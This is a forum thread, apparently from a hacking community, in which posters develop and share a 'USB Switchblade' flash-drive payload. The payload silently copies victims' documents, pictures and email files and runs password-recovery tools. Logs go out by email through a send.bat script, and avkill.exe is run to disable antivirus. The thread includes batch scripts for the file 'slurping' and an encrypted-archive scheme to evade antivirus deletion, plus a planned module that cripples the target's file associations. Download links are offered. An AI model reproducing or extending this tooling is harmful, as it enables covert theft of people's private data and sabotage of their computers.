Leapo

I'm willing to bet there's a way to do it without resorting to such software...Anybody know exactly what registry keys are created by Photoshop CS when it's installed? I might have an idea as to how to get it to run off of a portable flash drive with a little batch-fu.

It wasn't included with the release of 0.4, but I'm half finished reworking fc_slurp.bat and fc_slurp2.bat...for the third time. I should have thought of using rar.exe to do slurping in the first place, smaller files, and it preserved directory structure within the archive (unlike fc.exe). These new versions of slurp should be in the next release. Once again, thank you for your help with the mirrors, by the time I finished uploading to MegaUpload you had already posted! :P I've updated my original posts to reflect the version change, and put your new mirrors up in the download post. Oh, and for anybody wondering why I'm still calling this beta, it's because there's still broken code that's been disabled. As soon as everything in the broken code section (my 3rd original post) has been fixed, I'll probably jump straight to version 1.0 and remove the beta tag. As soon as I've finished up the new rar slurp method, I'm going to sit down with those two modules for a while and see if I can sort them out. Now, if anybody else would like to pitch in before-hand, I wouldn't mind in the least

Only problem is, it's $5000 :shock:

Yeah, I'll stick with standard RAR encryption. It has quite a few plusses: - It makes it easier for the end user to update the archive when they make a change (using the included script). - If I wanted to get paranoid, I could change the key every time I release a new version. - Users can set their own custom encryption key with a simple edit of my two batch files, which would completely the signature of the archive. I any case, this is just a temporary solution until I get around to implementing TrueCrypt (which will require many of the same edits as the U3 payload). I figure this is about as good a time as any for a release. Here's version 0.4 of my payload with the fixed up backup and restore scripts. These updated scripts should prevent other data (and the logs folder for that matter) from being constantly backed up and restored. http://rapidshare.com/files/38331130/Pocke...fe_b04.zip.html I'll throw up a few more mirrors and update my first posts in a little while, I just wanted to throw this up now so you guys could give it a shot. I'm really interested to see how different antiviruses will react to the restore function (it's turned on by default in this build). Edit: First post updated with download link, code samples, and semi-complete change log (I'm sure I'm forgetting something, can't remember what...)

Yeah, I just took a look around newegg myself, and that does appear to be the cheapest 4GB U3 flash drive around...is it just me, or are flash drive prices tanking hard? Anyway, I ordered the flash drive, total price came out to $46.81 Now don't think I won't be maintaining my non-U3 payload just because I'll have a U3 flash drive, I'll be maintaining both code bases equally...once I have a U3-only code base to maintain, that is

Yeah, I probably would probably be putting a lot more effort into a U3 version if I had a U3 drive to use it with myself. :P My 4GB drive is starting to act up (It's starting to lose information, probably due to WAY to many write cycles), so I might be in the market for a replacement flash drive anyway. I remember paying $60 for this non-U3 4GB flash drive, how much do 4GB U3 drives usually run? The payload itself is only a little over 16mb (a little more after the backup is created), so a 32mb flash drive would fit the payload and leave room for a few logs. If you like to do file slurping, though, a 4GB (or larger) drive is kinda a requirement, considering all the crap people tend to throw on their desktops and in their My Documents folders. Edit: I'm working on that new backup script now, but I need to know exactly what files set off various Antivirus solutions so I can backup the minimum amount of files. I don't want to backup more than I need to, because doing so makes the archive larger and increases the time needed to restore the backup. I'm using Avast, and it only picks up the following: - csrss.exe - mailpv.exe - sbs.exe

That's the first thing I'm planning on fixing; the next version of my payload will come with an updated version of my backup script that only backs up files that'll trip an antivirus, meaning that both the backup and restore functions will take much less time. Look out for a release soon

Instead of linking directly to modified versions of software, could you perhaps post how you made some of those apps portable? I happen to actually own Photoshop CS, and I would love to be able to put it on my flash drive and take it with me.

I could probably make my payload work completely off of the CD partition if I ran a few global replacements to correct the paths. The main issue is that I would need to buy a U3 drive to test it on... As for customization, I've had an interesting idea for the U3 version of my payload, and I don't think it's ever been done before. Instead of putting the entire switchblade on the CD partition, I'll only put the actual executables themselves (which keeps them safe from deletion), and I'll keep the batch files on the flash partition (for easy editing). This Hybrid payload would be the best of both worlds, antivirus can't nuke the executables, and you can still edit the batch files without re-flashing the CD partition every time. I would, or course, also maintain my non-U3 payload, using either my backup and restore script or TrueCrypt to protect the payload. You know GonZor, maybe Elmer and Setzer are right, maybe we should combine our efforts. We're working towards a common goal here, we both have some innovative ideas...What do you say GonZor? :) Hehe, nice little Hitchhikers reference ;) Let me know how that's working out for you. The encrypted RAR method is easier to manage by the end user of the payload, but TrueCrypt is more secure. I'm going to include both methods as optional modules (configurable via start.bat) as long as rar turns out to be mildly successful.

I've added my Automated Backup and Restore module, as well as the Switchblade Kill Switch module to the Switchblade Packages page of the Wiki. I'll throw up a link to my payload on the actual USB Switchblade page in a little bit, and maybe make a whole Wiki page dedicated to my payload when I have the time (I can go a lot more in-depth on a wiki page with no character limits).

Haha, I wasn't exactly planning for the stand-alone script to need mass distribution, as it'll be included in the next full payload build. Actually...that one might be a good idea after all. Considering that the version I posted here is a drop-in solution that should work on any switchblade, I think I'll throw up a little information about it on the Wiki.

Ok, I've cleaned up my backup script a little and plugged it into Start.bat so that it runs right after avkill.exe (might as well try killing whatever antivirus you have running). I'm also working on a batch file (nuke.bat) that will do all kinds of nasty things to the target computer, not the least of which will be changing most file associations to TXTFILE (disabled by default for obvious reasons). Both new features will be in the next payload version. I've tested it out, and the restore feature works like a charm, but I have a few concerns about it. First of all, it takes a while to restore the entire flash drive from the backup (although the user can turn it off if they know they won't be needing it). Second, I'm kinda worried about what these repeated write cycles will do to peoples thumbdrives, I don't want to kill anybodys flash drive prematurely because of my backup and restore script. I'm also toying around with your idea of re-associating *.vir files as executables, but any time a batch file calls for *.exe, it fails. I'm going to keep working on this...

@ elmer: I'll get right on that. @ setzer: It would involve some major changes to make my payload run entirely from the U3 portion of the flash drive. I have a working proof of concept that might make putting the files on the CD partition unnecessary anyway. It's basically an automated backup and restore function (currently using an encrypted RAR archive just to see if the concept works, I'm planning on using TrueCrypt in the future for extra security). Here's how you set it up: - Set up a clean switchblade that hasn't been nuked by your antivirus yet. - Download this zip file. (http://rapidshare.com/files/37957439/Restore.zip.html) - Drop the "Restore" folder (from the zip file you just downloaded) onto the root of the switchblade. - Open the Restore folder and run "Update_Archive.bat" to make an encrypted backup of the everything on the switchblade. Now you're all set, after your antivirus has nuked the switchblade again, here's how you restore the backup so you'll be ready to go again: - Plug the switchblade into a safe computer. - and run "Restore.bat" to restore the backup. - Your switchblade is now restored back to the last time you ran "Update_Archive.bat" Here's the code if you want to take a look at it: Update_Archive.bat: :: Removes old backup if it exists :: del ".Backup.rar" :: Archives and encryptes the contents of the switchblade with a stupidly long password :: .rar.exe a -hp[nowayinhelltheycanbreakkthispassword9876309531681145690] -r ".Backup.rar" ".." Restore.bat: :: Created a backup copy of our backup. This is just in case you didn't plug your switchblade into :: a safe computer before attempting to restore. This should keep your real backup safe while the :: Antivirus nukes the copy :: copy ".Backup.rar" ".Backup_Safe.rar" :: Here we unarchive the copy of the backup we just made :: .rar.exe x -o+ -p[nowayinhelltheycanbreakkthispassword9876309531681145690] ".Backup_Safe.rar" ".." ::And now that it's finished, we deleat the backup of the backup. :: del ".Backup_Safe.rar" Keep in mind that this is just a proof of concept! It fools Avast and AVG Antivirus as long as you don't attempt to restore on a system that has it's antivirus active, but I can't yet guarantee that this will be completely fool proof. @GonZor: I'm sooo tempted to add that line to my payload . Only problem is, it'll still break batch scripts that look for *.exe because the file extension has been changed to *.vir I already have a batch file that changes all executable associations (bat, exe, cmd, etc) to text files, but I'm debating as to weather I should include it as an optional module in my payload, considering it completely screws over whatever system you run it on unless you can get to the recovery console to fix it.

That was fast Let me go edit the download post again. I can't tell you how much I appreciate the help!

No offense taken, I know large portions of my payload are direct rips from the wiki, I'm just trying to make everything play nice together. Once I've crammed everything in, I might go back and start streamlining the inner workings a little (look at how much better fc_slurp.bat and fc_slurp2.bat are compared to their predecessors from version 0.2). yeah, I was worried about AVs killing the backup archive. I'll give TrueCrypt a shot, copying the archive and then extracting from the copy should keep everything nice and safe (as long as TrueCrypt works) Once again, many thanks for the help Elmer! I'll copy those mirrors over to my post right now. Upload your ISO whenever you get a chance. For now, I'll build an ISO on my end using your code and upload it so U3 users can get in on the action. Truecrypt can work from the command line. I would go about this in a similar fashion to what you have stated. I would put the entire payload onto the encrypted drive and give it an autorun.inf that would run the payload. It would be harder to make the U3 version of this, but something in the wiki talked about using TrueCrypt with the switchblade. Yes its actually very simple to do, although the problem is true crypt doesn't always work. then again i guess if you don't have permissions to use true crypt the logs generated wouldn't be much use. Once again It would be a valid idea to copy the volume and never extract from the original volume, AV's can decimate a volume if you can access it. Now there's an idea, the TrueCrypt volume could be located on the CD partition for the U3 compatible version of my payload. This would ensure that the backup doesn't get nuked (on the U3 version anyway), and still allow for easy access to the guts of the payload on the flash portion of the disk. BTW, You also said something about working on your own custom solution for this? What might that entail?

I might have an idea as to how to do it...anybody know of a command-line app that can automatically unzip an encrypted or password protected archive? If I could store a copy of the contents of my payload (or at least the parts that would be suspect for deletion) in an encrypted archive, and have it unzip automatically before every payload run, you would effectively have an unbreakable switchblade. True, this doesn't prevent the apps from being deleted, but it would restore the apps and fix the payload automatically before the next run... WOW, I think I might have something there!! :shock:

Oops, didn't realize!

There's an issue with copying more than one file type at once? It works fine for me... For example, the code below copies every file inside "C:Documents and settings" completely indiscriminately, and dumps them all into "D:Documents and Settings Backup" (Though the directory structure gets blown away, so everything located in a sub folder gets dumped directly into the Backup folder) fc.exe "C:Documents and Settings*" "D:Documents and Settings Backup*" /I /O

First things first, a new version has been released! Major highlights for this release include completely overhauled versions of Slurp and Slurp2.bat (now renamed fc_slurp and fc_slurp2.bat), a fixed version of Port_Scan.bat (thanks go to Elmer and GonZor for their help), and improvements to my code comments such as typo fixes and additional information. So, version 0.3 is now up the download link is in the usual place (in the 4th post of the thread, along with a change log)... Or if you're all too lazy to scroll up to my original posts, here are the links for Rapidshare and MegaUpload. @ Elmer and GonZor: Thanks for the help with this pesky module, it took a little more tweaking to get Port_Scan.bat to work properly, but I finally managed to get it to play nice with the other modules. It might be a tad unconventional, but at least it works: mkdir ....Documentslogfiles%computername% Echo ************************************ > ....Documentslogfiles%computername%Port_Scan.log 2>&1 echo ************[Port Scan]************* >> ....Documentslogfiles%computername%Port_Scan.log 2>&1 Echo ************************************ >> ....Documentslogfiles%computername%Port_Scan.log 2>&1 .portqry -local -l ....Documentslogfiles%computername%%computername%_ports.txt>>nul type ....Documentslogfiles%computername%%computername%_ports.txt >> ....Documentslogfiles%computername%Port_Scan.log 2>&1 del /f/q %~d0Documentslogfiles%computername%%computername%_ports.txt @ GonZor: Interesting proposition, merging our payloads, but how would we go about it? At this point, most of my code would need to be overhauled to work with the rest of your payload, but it looks like bringing over the modules I'm missing from your payload would be relatively easy...seems a shame, though, considering how clean your code is compared to mine (though mine doesn't need to be as clean due to the use of Start.bat to manage active modules). @ Elmer: You mentioned something about attempting to make my payload U3 compatible; if that works out, and I converted over the modules from GonZor's payload that I don't have, the only thing his current payload would have over mine is that it runs completely off of the CD partition of the U3 drive. If there's a way to keep the non-U3 portion of a flash drive safe from being nuked by Antivirus software, this might just be the way to go.

Would it be at all possible to add a switch to make File Copier preserve directory structure when copying from sub folders? It's nice being able to copy files located in sub folders, but not when they all get dumped into the target folder :-P Thanks!

Thanks for the tip GonZor, I'll give that a shot (I wasn't the original author of that particular chunk of code, so I wasn't exactly sure what was had going on there). As for who's payload is 'the one'... you do have the advantage of having your payload on the U3 section of the flash drive, which keeps everything safe from deletion by an antivirus and makes sure it auto-runs without any user-interaction, but there are quite a few trade-offs for doing it that way (yours can't be installed on a USB hard disk and used for mass file slurping for instance). Now it isn't like my payload is completely perfect either, but were still debugging the darn thing in here :P I've just downloaded your payload, and I see I have a few things you don't, and you have a few things I don't. Considering my payload is already a compilation of over 5 other payloads, would you mind if I added some code from yours into the mix as well? :D

Well, bad news elmer, I'm getting no output from the code you posted. It looks like the batch file isn't finding the executable (PortQry.exe) that's sitting in the folder with it. The "CD" command I had in there before fixed this issue, but it broke other batch files when run in succession... Edit: Getting fc.exe to copy multiple files of multiple types is pretty darn easy compared to xCopy. The example code below will copy everything from the ".TestCopy From" folder to the ".TestCopy To" folder (this includes sub folders and anything located within them) fc.exe ".TestCopy From*" ".TestCopy To*" /i /o So for example, here's what Slurp2.bat (used for copying the entire contents of the My Documents folder and Desktop) looks like using xCopy: :: My Documents files mkdir ....Documentslogfiles%computername%Slurp_DataMyDocuments mkdir ....Documentslogfiles%computername%Slurp_DataMyMusic mkdir ....Documentslogfiles%computername%Slurp_DataMyVideos mkdir ....Documentslogfiles%computername%Slurp_DataMyPictures xcopy "C:Documents and Settings%username%My Documents*.doc" ....Documentslogfiles%computername%Slurp_DataMyDocuments /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.docx" ....Documentslogfiles%computername%Slurp_DataMyDocuments /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.rtf" ....Documentslogfiles%computername%Slurp_DataMyDocuments /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.txt" ....Documentslogfiles%computername%Slurp_DataMyDocuments /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.xls" ....Documentslogfiles%computername%Slurp_DataMyDocuments /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.csv" ....Documentslogfiles%computername%Slurp_DataMyDocuments /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.ppt" ....Documentslogfiles%computername%Slurp_DataMyDocuments /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.pptx" ....Documentslogfiles%computername%Slurp_DataMyDocuments /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.mdb" ....Documentslogfiles%computername%Slurp_DataMyDocuments /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.jpg" ....Documentslogfiles%computername%Slurp_DataMyPictures /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.png" ....Documentslogfiles%computername%Slurp_DataMyPictures /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.bmp" ....Documentslogfiles%computername%Slurp_DataMyPictures /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.gif" ....Documentslogfiles%computername%Slurp_DataMyPictures /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.htm" ....Documentslogfiles%computername%Slurp_DataMyDocuments /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.html" ....Documentslogfiles%computername%Slurp_DataMyDocuments /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.eml" ....Documentslogfiles%computername%Slurp_DataMyDocuments /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.msg" ....Documentslogfiles%computername%Slurp_DataMyDocuments /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.zip" ....Documentslogfiles%computername%Slurp_DataMyDocuments /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.rar" ....Documentslogfiles%computername%Slurp_DataMyDocuments /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.7z" ....Documentslogfiles%computername%Slurp_DataMyDocuments /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.psd" ....Documentslogfiles%computername%Slurp_DataMyPictures /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.jpg" ....Documentslogfiles%computername%Slurp_DataMyPictures /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.wma" ....Documentslogfiles%computername%Slurp_DataMyMusic /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.wav" ....Documentslogfiles%computername%Slurp_DataMyMusic /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.mp3" ....Documentslogfiles%computername%Slurp_DataMyMusic /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.ogg" ....Documentslogfiles%computername%Slurp_DataMyMusic /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.mpg" ....Documentslogfiles%computername%Slurp_DataMyVideos /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.avi" ....Documentslogfiles%computername%Slurp_DataMyVideos /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.wmv" ....Documentslogfiles%computername%Slurp_DataMyVideos /s/c/q/r/h :: Desktop files mkdir ....Documentslogfiles%computername%Slurp_DataDesktop xcopy "C:Documents and Settings%username%Desktop*.doc" ....Documentslogfiles%computername%Slurp_DataDesktop /s/c/q/r/h xcopy "C:Documents and Settings%username%Desktop*.rtf" ....Documentslogfiles%computername%Slurp_DataDesktop /s/c/q/r/h xcopy "C:Documents and Settings%username%Desktop*.txt" ....Documentslogfiles%computername%Slurp_DataDesktop /s/c/q/r/h xcopy "C:Documents and Settings%username%Desktop*.xls" ....Documentslogfiles%computername%Slurp_DataDesktop /s/c/q/r/h xcopy "C:Documents and Settings%username%Desktop*.csv" ....Documentslogfiles%computername%Slurp_DataDesktop /s/c/q/r/h xcopy "C:Documents and Settings%username%Desktop*.ppt" ....Documentslogfiles%computername%Slurp_DataDesktop /s/c/q/r/h xcopy "C:Documents and Settings%username%Desktop*.mdb" ....Documentslogfiles%computername%Slurp_DataDesktop /s/c/q/r/h xcopy "C:Documents and Settings%username%Desktop*.jpg" ....Documentslogfiles%computername%Slurp_DataDesktop /s/c/q/r/h xcopy "C:Documents and Settings%username%Desktop*.gif" ....Documentslogfiles%computername%Slurp_DataDesktop /s/c/q/r/h xcopy "C:Documents and Settings%username%Desktop*.htm" ....Documentslogfiles%computername%Slurp_DataDesktop /s/c/q/r/h xcopy "C:Documents and Settings%username%Desktop*.eml" ....Documentslogfiles%computername%Slurp_DataDesktop /s/c/q/r/h xcopy "C:Documents and Settings%username%Desktop*.msg" ....Documentslogfiles%computername%Slurp_DataDesktop /s/c/q/r/h And here's what it looks like using FileCopier (fc.exe): :: My Documents files mkdir ....Documentslogfiles%computername%Slurp_DataMyDocuments fc.exe "C:Documents and Settings%username%My Documents*" "....Documentslogfiles%computername%Slurp_DataMyDocuments*" /i /o :: Desktop files mkdir ....Documentslogfiles%computername%Slurp_DataDesktop fc.exe "C:Documents and Settings%username%Desktop*" "....Documentslogfiles%computername%Slurp_DataDesktop*" /i /o many thanks to Obi-Wahn for making such a helpful application!

@ MakMike: That's strange, considering I use the same method of launching the hacksaw that's employed on U3 distributions of the Hacksaw. I downloaded the original U3 hacksaw (the same one used on the show), copied the thumbdrive portion directly over to my payload, then I pulled the vb script they used to start the switchblade from the CD partition, decoded it, and modified it to work from the WIPCMD folder. In other words, if the original "as-seen-on-tv" hacksaw works, so should my hacksaw, because all that was changed was a path or two. Are you sure you edited send.bat correctly? If you don't enter the information exactly right, it'll just silently fail to send. Also, make sure you're using a Gmail password that contains NO SPACES; passwords with spaces aren't properly supported (everything after the first space is ignored). @ elmer: Thanks for the fix, I'll test it out a little and add it to the payload, along with my new versions of Slurp and Slurp2.bat...after I compare it to my busted code to see what you had to change to fix it XD

Holy cow elmer, thanks! You got those mirrors up darn quick! I'm going to go ahead and add those mirrors to the main download post.

Download link posted, have at it! Any fixes you guys come up with I'll add to the payload, let's see if we can make this "the one". As for how long I've been working on it...well, I've been slowly building it since the original hacksaw came out. (not bad for my 10th through 14th posts ) I'll keep hammering away on my end, I really want to change the slurp.bat and slurp2.bat files over to FileCopy (FC.exe) instead of xCopy to remove the need to make a new xCopy command for every file extension you want to slurp. I'll probably have it all fixed by tonight, but feel free to use the current incarnation of Slurp, it just isn't quite as efficient as the new version will be.